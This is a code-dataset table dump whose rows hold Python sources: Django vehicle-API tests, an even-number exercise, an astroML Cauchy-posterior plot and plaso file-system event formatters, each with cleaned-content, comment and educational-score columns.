max_stars_repo_path
stringlengths 4
286
| max_stars_repo_name
stringlengths 5
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.03M
| content_cleaned
stringlengths 6
1.03M
| language
stringclasses 111
values | language_score
float64 0.03
1
| comments
stringlengths 0
556k
| edu_score
float64 0.32
5.03
| edu_int_score
int64 0
5
|
---|---|---|---|---|---|---|---|---|---|---|
src/python/errors.py | Miravalier/canonfire | 1 | 8500 | <reponame>Miravalier/canonfire<gh_stars>1-10
class AuthError(Exception):
pass
class JsonError(Exception):
pass
| class AuthError(Exception):
pass
class JsonError(Exception):
pass | none | 1 | 1.328375 | 1 |
|
vehicle/tests.py | COS301-SE-2020/ctrlintelligencecapstone | 0 | 8501 | <gh_stars>0
from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
import requests
import pytest
import json
from django.core.management import call_command
from django.db.models.signals import pre_save, post_save, pre_delete, post_delete, m2m_changed
from rest_framework.test import APIClient
# Create your tests here.
# @pytest.fixture(autouse=True)
# def django_db_setup(django_db_setup, django_db_blocker):
# signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed]
# restore = {}
# with django_db_blocker.unblock():
# call_command("loaddata", "test_stuff.json")
def get_valid_token(client):
client = APIClient()
login_data = {
"username": "steve",
"password": "<PASSWORD>"
}
response = client.post('/api-auth/', data=login_data, format='json', headers={'Content-Type': 'application/json'})
assert response.status_code == 400
response.render()
response_string = response.content.decode("utf-8")
return json.loads(response_string).get("token")
@pytest.mark.django_db
def test_add_vehicle_basic(client):
url = '/api/v1/vehicle/add_vehicle_basic/'
data = {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
token = get_valid_token(client)
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
response = client.post(url, data=data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_get_vehicle(client):
url = '/api/v1/vehicle/get_vehicle/'
data = {
'license_plate' : 'BE32SNGP'
}
response = client.post(url,data)
assert response.status_code == 401
@pytest.mark.django_db
def test_search(client):
url = '/api/v1/vehicle/search/'
data = {
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
response = client.post(url,data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_file_recognize(client):
import pathlib
url = '/api/v1/vehicle/file_recognize/'
# response = client.post(url,data)
path = pathlib.Path(__file__).parent.absolute()
actual_path ='{}/test_images/2015-BMW-320d-xDrive-Touring-test-drive-67.jpg'.format(path)
files = [
('file', open("{}".format(actual_path), 'rb'))
]
data = {
'file' : files[0]
}
response = client.post(url, data=data, files=files)
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_and(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_get_duplicates(client):
url = '/api/v1/vehicle/get_duplicates/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_saps_flagged(client):
url = '/api/v1/vehicle/get_saps_flagged/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_or(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'or',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
| from rest_framework.test import APITestCase
from rest_framework.test import APIRequestFactory
import requests
import pytest
import json
from django.core.management import call_command
from django.db.models.signals import pre_save, post_save, pre_delete, post_delete, m2m_changed
from rest_framework.test import APIClient
# Create your tests here.
# @pytest.fixture(autouse=True)
# def django_db_setup(django_db_setup, django_db_blocker):
# signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed]
# restore = {}
# with django_db_blocker.unblock():
# call_command("loaddata", "test_stuff.json")
def get_valid_token(client):
client = APIClient()
login_data = {
"username": "steve",
"password": "<PASSWORD>"
}
response = client.post('/api-auth/', data=login_data, format='json', headers={'Content-Type': 'application/json'})
assert response.status_code == 400
response.render()
response_string = response.content.decode("utf-8")
return json.loads(response_string).get("token")
@pytest.mark.django_db
def test_add_vehicle_basic(client):
url = '/api/v1/vehicle/add_vehicle_basic/'
data = {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
token = get_valid_token(client)
client = APIClient()
client.credentials(HTTP_AUTHORIZATION='Token {}'.format(token))
response = client.post(url, data=data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_get_vehicle(client):
url = '/api/v1/vehicle/get_vehicle/'
data = {
'license_plate' : 'BE32SNGP'
}
response = client.post(url,data)
assert response.status_code == 401
@pytest.mark.django_db
def test_search(client):
url = '/api/v1/vehicle/search/'
data = {
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
response = client.post(url,data, format='json')
assert response.status_code == 401
@pytest.mark.django_db
def test_file_recognize(client):
import pathlib
url = '/api/v1/vehicle/file_recognize/'
# response = client.post(url,data)
path = pathlib.Path(__file__).parent.absolute()
actual_path ='{}/test_images/2015-BMW-320d-xDrive-Touring-test-drive-67.jpg'.format(path)
files = [
('file', open("{}".format(actual_path), 'rb'))
]
data = {
'file' : files[0]
}
response = client.post(url, data=data, files=files)
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_and(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_get_duplicates(client):
url = '/api/v1/vehicle/get_duplicates/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_saps_flagged(client):
url = '/api/v1/vehicle/get_saps_flagged/'
data = {
'type' : 'and',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401
@pytest.mark.django_db
def test_search_advanced_or(client):
url = '/api/v1/vehicle/search_advances/'
data = {
'type' : 'or',
'filters' : {
'license_plate' : 'BE32SNGP',
'make' : 'Toyota',
'model' : 'Corolla',
'color' : 'White'
}
}
# response = client.post(url,data)
response = client.post(url, data=data, format="json")
assert response.status_code == 401 | en | 0.566833 | # Create your tests here. # @pytest.fixture(autouse=True) # def django_db_setup(django_db_setup, django_db_blocker): # signals = [pre_save, post_save, pre_delete, post_delete, m2m_changed] # restore = {} # with django_db_blocker.unblock(): # call_command("loaddata", "test_stuff.json") # response = client.post(url,data) # response = client.post(url,data) # response = client.post(url,data) # response = client.post(url,data) # response = client.post(url,data) | 2.100935 | 2 |
simple_exercises/lanesexercises/py_functions2/rep_ex3.py | ilante/programming_immanuela_englander | 0 | 8502 | <filename>simple_exercises/lanesexercises/py_functions2/rep_ex3.py
# 3. Define a function to check whether a number is even
def even(num):
if num%2 == 0:
return True
else:
return False
print(even(4))
print(even(-5))
| <filename>simple_exercises/lanesexercises/py_functions2/rep_ex3.py
# 3. Define a function to check whether a number is even
def even(num):
if num%2 == 0:
return True
else:
return False
print(even(4))
print(even(-5))
| en | 0.668047 | # 3. Define a function to check whether a number is even | 4.088111 | 4 |
book_figures/chapter5/fig_posterior_cauchy.py | aragilar/astroML | 3 | 8503 | <gh_stars>1-10
"""
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: <NAME>
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show()
| """
Posterior for Cauchy Distribution
---------------------------------
Figure 5.11
The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel)
and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the
two-dimensional pdf from figure 5.10. The dashed lines show the distribution
of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median
and interquartile range. The bottom panels show the corresponding cumulative
distributions.
"""
# Author: <NAME>
# License: BSD
# The figure produced by this code is published in the textbook
# "Statistics, Data Mining, and Machine Learning in Astronomy" (2013)
# For more information, see http://astroML.github.com
# To report a bug or issue, use the following forum:
# https://groups.google.com/forum/#!forum/astroml-general
import numpy as np
from matplotlib import pyplot as plt
from scipy.stats import cauchy
from astroML.stats import median_sigmaG
from astroML.resample import bootstrap
#----------------------------------------------------------------------
# This function adjusts matplotlib settings for a uniform feel in the textbook.
# Note that with usetex=True, fonts are rendered with LaTeX. This may
# result in an error if LaTeX is not installed on your system. In that case,
# you can set usetex to False.
from astroML.plotting import setup_text_plots
setup_text_plots(fontsize=8, usetex=True)
def cauchy_logL(x, gamma, mu):
"""Equation 5.74: cauchy likelihood"""
x = np.asarray(x)
n = x.size
# expand x for broadcasting
shape = np.broadcast(gamma, mu).shape
x = x.reshape(x.shape + tuple([1 for s in shape]))
return ((n - 1) * np.log(gamma)
- np.sum(np.log(gamma ** 2 + (x - mu) ** 2), 0))
def estimate_mu_gamma(xi, axis=None):
"""Equation 3.54: Cauchy point estimates"""
q25, q50, q75 = np.percentile(xi, [25, 50, 75], axis=axis)
return q50, 0.5 * (q75 - q25)
#------------------------------------------------------------
# Draw a random sample from the cauchy distribution, and compute
# marginalized posteriors of mu and gamma
np.random.seed(44)
n = 10
mu_0 = 0
gamma_0 = 2
xi = cauchy(mu_0, gamma_0).rvs(n)
gamma = np.linspace(0.01, 5, 70)
dgamma = gamma[1] - gamma[0]
mu = np.linspace(-3, 3, 70)
dmu = mu[1] - mu[0]
likelihood = np.exp(cauchy_logL(xi, gamma[:, np.newaxis], mu))
pmu = likelihood.sum(0)
pmu /= pmu.sum() * dmu
pgamma = likelihood.sum(1)
pgamma /= pgamma.sum() * dgamma
#------------------------------------------------------------
# bootstrap estimate
mu_bins = np.linspace(-3, 3, 21)
gamma_bins = np.linspace(0, 5, 17)
mu_bootstrap, gamma_bootstrap = bootstrap(xi, 20000, estimate_mu_gamma,
kwargs=dict(axis=1), random_state=0)
#------------------------------------------------------------
# Plot results
fig = plt.figure(figsize=(5, 5))
fig.subplots_adjust(wspace=0.35, right=0.95,
hspace=0.2, top=0.95)
# first axes: mu posterior
ax1 = fig.add_subplot(221)
ax1.plot(mu, pmu, '-k')
ax1.hist(mu_bootstrap, mu_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax1.set_xlabel(r'$\mu$')
ax1.set_ylabel(r'$p(\mu|x,I)$')
# second axes: mu cumulative posterior
ax2 = fig.add_subplot(223, sharex=ax1)
ax2.plot(mu, pmu.cumsum() * dmu, '-k')
ax2.hist(mu_bootstrap, mu_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax2.set_xlabel(r'$\mu$')
ax2.set_ylabel(r'$P(<\mu|x,I)$')
ax2.set_xlim(-3, 3)
# third axes: gamma posterior
ax3 = fig.add_subplot(222, sharey=ax1)
ax3.plot(gamma, pgamma, '-k')
ax3.hist(gamma_bootstrap, gamma_bins, normed=True,
histtype='step', color='b', linestyle='dashed')
ax3.set_xlabel(r'$\gamma$')
ax3.set_ylabel(r'$p(\gamma|x,I)$')
ax3.set_ylim(-0.05, 1.1)
# fourth axes: gamma cumulative posterior
ax4 = fig.add_subplot(224, sharex=ax3, sharey=ax2)
ax4.plot(gamma, pgamma.cumsum() * dgamma, '-k')
ax4.hist(gamma_bootstrap, gamma_bins, normed=True, cumulative=True,
histtype='step', color='b', linestyle='dashed')
ax4.set_xlabel(r'$\gamma$')
ax4.set_ylabel(r'$P(<\gamma|x,I)$')
ax4.set_ylim(-0.05, 1.1)
ax4.set_xlim(0, 4)
plt.show() | en | 0.609688 | Posterior for Cauchy Distribution --------------------------------- Figure 5.11 The solid lines show the posterior pdf :math:`p(\mu|{x_i},I)` (top-left panel) and the posterior pdf :math:`p(\gamma|{x_i},I)` (top-right panel) for the two-dimensional pdf from figure 5.10. The dashed lines show the distribution of approximate estimates of :math:`\mu` and :math:`\gamma` based on the median and interquartile range. The bottom panels show the corresponding cumulative distributions. # Author: <NAME> # License: BSD # The figure produced by this code is published in the textbook # "Statistics, Data Mining, and Machine Learning in Astronomy" (2013) # For more information, see http://astroML.github.com # To report a bug or issue, use the following forum: # https://groups.google.com/forum/#!forum/astroml-general #---------------------------------------------------------------------- # This function adjusts matplotlib settings for a uniform feel in the textbook. # Note that with usetex=True, fonts are rendered with LaTeX. This may # result in an error if LaTeX is not installed on your system. In that case, # you can set usetex to False. Equation 5.74: cauchy likelihood # expand x for broadcasting Equation 3.54: Cauchy point estimates #------------------------------------------------------------ # Draw a random sample from the cauchy distribution, and compute # marginalized posteriors of mu and gamma #------------------------------------------------------------ # bootstrap estimate #------------------------------------------------------------ # Plot results # first axes: mu posterior # second axes: mu cumulative posterior # third axes: gamma posterior # fourth axes: gamma cumulative posterior | 2.679149 | 3 |
plaso/formatters/file_system.py | SamuelePilleri/plaso | 0 | 8504 | <filename>plaso/formatters/file_system.py
# -*- coding: utf-8 -*-
"""The file system stat event formatter."""
from __future__ import unicode_literals
from dfvfs.lib import definitions as dfvfs_definitions
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class FileStatEventFormatter(interface.ConditionalEventFormatter):
"""The file system stat event formatter."""
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = [
'{display_name}',
'Type: {file_entry_type}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}']
SOURCE_SHORT = 'FILE'
# The numeric values are for backwards compatibility with plaso files
# generated with older versions of dfvfs.
_FILE_ENTRY_TYPES = {
1: 'device',
2: 'directory',
3: 'file',
4: 'link',
5: 'socket',
6: 'pipe',
dfvfs_definitions.FILE_ENTRY_TYPE_DEVICE: 'device',
dfvfs_definitions.FILE_ENTRY_TYPE_DIRECTORY: 'directory',
dfvfs_definitions.FILE_ENTRY_TYPE_FILE: 'file',
dfvfs_definitions.FILE_ENTRY_TYPE_LINK: 'link',
dfvfs_definitions.FILE_ENTRY_TYPE_SOCKET: 'socket',
dfvfs_definitions.FILE_ENTRY_TYPE_PIPE: 'pipe'}
# pylint: disable=unused-argument
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_entry_type = event_values.get('file_entry_type', None)
if file_entry_type is not None:
event_values['file_entry_type'] = self._FILE_ENTRY_TYPES.get(
file_entry_type, 'UNKNOWN')
# The usage of allocated is deprecated in favor of is_allocated but
# is kept here to be backwards compatible.
if (not event_values.get('allocated', False) and
not event_values.get('is_allocated', False)):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
def GetSources(self, event):
"""Determines the the short and long source for an event object.
Args:
event (EventObject): event.
Returns:
tuple(str, str): short and long source string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
file_system_type = getattr(event, 'file_system_type', 'UNKNOWN')
timestamp_desc = getattr(event, 'timestamp_desc', 'Time')
source_long = '{0:s} {1:s}'.format(file_system_type, timestamp_desc)
return self.SOURCE_SHORT, source_long
class NTFSFileStatEventFormatter(FileStatEventFormatter):
"""The NTFS file system stat event formatter."""
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = [
'{display_name}',
'File reference: {file_reference}',
'Attribute name: {attribute_name}',
'Name: {name}',
'Parent file reference: {parent_file_reference}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{attribute_name}']
SOURCE_SHORT = 'FILE'
_ATTRIBUTE_NAMES = {
0x00000010: '$STANDARD_INFORMATION',
0x00000030: '$FILE_NAME'
}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
attribute_type = event_values.get('attribute_type', 0)
event_values['attribute_name'] = self._ATTRIBUTE_NAMES.get(
attribute_type, 'UNKNOWN')
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
if not event_values.get('is_allocated', False):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
class NTFSUSNChangeEventFormatter(interface.ConditionalEventFormatter):
"""The NTFS USN change event formatter."""
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = [
'{filename}',
'File reference: {file_reference}',
'Parent file reference: {parent_file_reference}',
'Update source: {update_source}',
'Update reason: {update_reason}']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{update_reason}']
SOURCE_SHORT = 'FILE'
_USN_REASON_FLAGS = {
0x00000001: 'USN_REASON_DATA_OVERWRITE',
0x00000002: 'USN_REASON_DATA_EXTEND',
0x00000004: 'USN_REASON_DATA_TRUNCATION',
0x00000010: 'USN_REASON_NAMED_DATA_OVERWRITE',
0x00000020: 'USN_REASON_NAMED_DATA_EXTEND',
0x00000040: 'USN_REASON_NAMED_DATA_TRUNCATION',
0x00000100: 'USN_REASON_FILE_CREATE',
0x00000200: 'USN_REASON_FILE_DELETE',
0x00000400: 'USN_REASON_EA_CHANGE',
0x00000800: 'USN_REASON_SECURITY_CHANGE',
0x00001000: 'USN_REASON_RENAME_OLD_NAME',
0x00002000: 'USN_REASON_RENAME_NEW_NAME',
0x00004000: 'USN_REASON_INDEXABLE_CHANGE',
0x00008000: 'USN_REASON_BASIC_INFO_CHANGE',
0x00010000: 'USN_REASON_HARD_LINK_CHANGE',
0x00020000: 'USN_REASON_COMPRESSION_CHANGE',
0x00040000: 'USN_REASON_ENCRYPTION_CHANGE',
0x00080000: 'USN_REASON_OBJECT_ID_CHANGE',
0x00100000: 'USN_REASON_REPARSE_POINT_CHANGE',
0x00200000: 'USN_REASON_STREAM_CHANGE',
0x00400000: 'USN_REASON_TRANSACTED_CHANGE',
0x80000000: 'USN_REASON_CLOSE'}
_USN_SOURCE_FLAGS = {
0x00000001: 'USN_SOURCE_DATA_MANAGEMENT',
0x00000002: 'USN_SOURCE_AUXILIARY_DATA',
0x00000004: 'USN_SOURCE_REPLICATION_MANAGEMENT'}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
update_reason_flags = event_values.get('update_reason_flags', 0)
update_reasons = []
for bitmask, description in sorted(self._USN_REASON_FLAGS.items()):
if bitmask & update_reason_flags:
update_reasons.append(description)
event_values['update_reason'] = ', '.join(update_reasons)
update_source_flags = event_values.get('update_source_flags', 0)
update_sources = []
for bitmask, description in sorted(self._USN_SOURCE_FLAGS.items()):
if bitmask & update_source_flags:
update_sources.append(description)
event_values['update_source'] = ', '.join(update_sources)
return self._ConditionalFormatMessages(event_values)
manager.FormattersManager.RegisterFormatters([
FileStatEventFormatter, NTFSFileStatEventFormatter,
NTFSUSNChangeEventFormatter])
| <filename>plaso/formatters/file_system.py
# -*- coding: utf-8 -*-
"""The file system stat event formatter."""
from __future__ import unicode_literals
from dfvfs.lib import definitions as dfvfs_definitions
from plaso.formatters import interface
from plaso.formatters import manager
from plaso.lib import errors
class FileStatEventFormatter(interface.ConditionalEventFormatter):
"""The file system stat event formatter."""
DATA_TYPE = 'fs:stat'
FORMAT_STRING_PIECES = [
'{display_name}',
'Type: {file_entry_type}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}']
SOURCE_SHORT = 'FILE'
# The numeric values are for backwards compatibility with plaso files
# generated with older versions of dfvfs.
_FILE_ENTRY_TYPES = {
1: 'device',
2: 'directory',
3: 'file',
4: 'link',
5: 'socket',
6: 'pipe',
dfvfs_definitions.FILE_ENTRY_TYPE_DEVICE: 'device',
dfvfs_definitions.FILE_ENTRY_TYPE_DIRECTORY: 'directory',
dfvfs_definitions.FILE_ENTRY_TYPE_FILE: 'file',
dfvfs_definitions.FILE_ENTRY_TYPE_LINK: 'link',
dfvfs_definitions.FILE_ENTRY_TYPE_SOCKET: 'socket',
dfvfs_definitions.FILE_ENTRY_TYPE_PIPE: 'pipe'}
# pylint: disable=unused-argument
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
file_entry_type = event_values.get('file_entry_type', None)
if file_entry_type is not None:
event_values['file_entry_type'] = self._FILE_ENTRY_TYPES.get(
file_entry_type, 'UNKNOWN')
# The usage of allocated is deprecated in favor of is_allocated but
# is kept here to be backwards compatible.
if (not event_values.get('allocated', False) and
not event_values.get('is_allocated', False)):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
def GetSources(self, event):
"""Determines the the short and long source for an event object.
Args:
event (EventObject): event.
Returns:
tuple(str, str): short and long source string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
file_system_type = getattr(event, 'file_system_type', 'UNKNOWN')
timestamp_desc = getattr(event, 'timestamp_desc', 'Time')
source_long = '{0:s} {1:s}'.format(file_system_type, timestamp_desc)
return self.SOURCE_SHORT, source_long
class NTFSFileStatEventFormatter(FileStatEventFormatter):
"""The NTFS file system stat event formatter."""
DATA_TYPE = 'fs:stat:ntfs'
FORMAT_STRING_PIECES = [
'{display_name}',
'File reference: {file_reference}',
'Attribute name: {attribute_name}',
'Name: {name}',
'Parent file reference: {parent_file_reference}',
'({unallocated})']
FORMAT_STRING_SHORT_PIECES = [
'{filename}',
'{file_reference}',
'{attribute_name}']
SOURCE_SHORT = 'FILE'
_ATTRIBUTE_NAMES = {
0x00000010: '$STANDARD_INFORMATION',
0x00000030: '$FILE_NAME'
}
def GetMessages(self, formatter_mediator, event):
"""Determines the formatted message strings for an event object.
Args:
formatter_mediator (FormatterMediator): mediates the interactions
between formatters and other components, such as storage and Windows
EventLog resources.
event (EventObject): event.
Returns:
tuple(str, str): formatted message string and short message string.
Raises:
WrongFormatter: if the event object cannot be formatted by the formatter.
"""
if self.DATA_TYPE != event.data_type:
raise errors.WrongFormatter('Unsupported data type: {0:s}.'.format(
event.data_type))
event_values = event.CopyToDict()
attribute_type = event_values.get('attribute_type', 0)
event_values['attribute_name'] = self._ATTRIBUTE_NAMES.get(
attribute_type, 'UNKNOWN')
file_reference = event_values.get('file_reference', None)
if file_reference:
event_values['file_reference'] = '{0:d}-{1:d}'.format(
file_reference & 0xffffffffffff, file_reference >> 48)
parent_file_reference = event_values.get('parent_file_reference', None)
if parent_file_reference:
event_values['parent_file_reference'] = '{0:d}-{1:d}'.format(
parent_file_reference & 0xffffffffffff, parent_file_reference >> 48)
if not event_values.get('is_allocated', False):
event_values['unallocated'] = 'unallocated'
return self._ConditionalFormatMessages(event_values)
class NTFSUSNChangeEventFormatter(interface.ConditionalEventFormatter):
"""The NTFS USN change event formatter."""
DATA_TYPE = 'fs:ntfs:usn_change'
FORMAT_STRING_PIECES = [
'{filename}',
'File reference: {file_reference}',
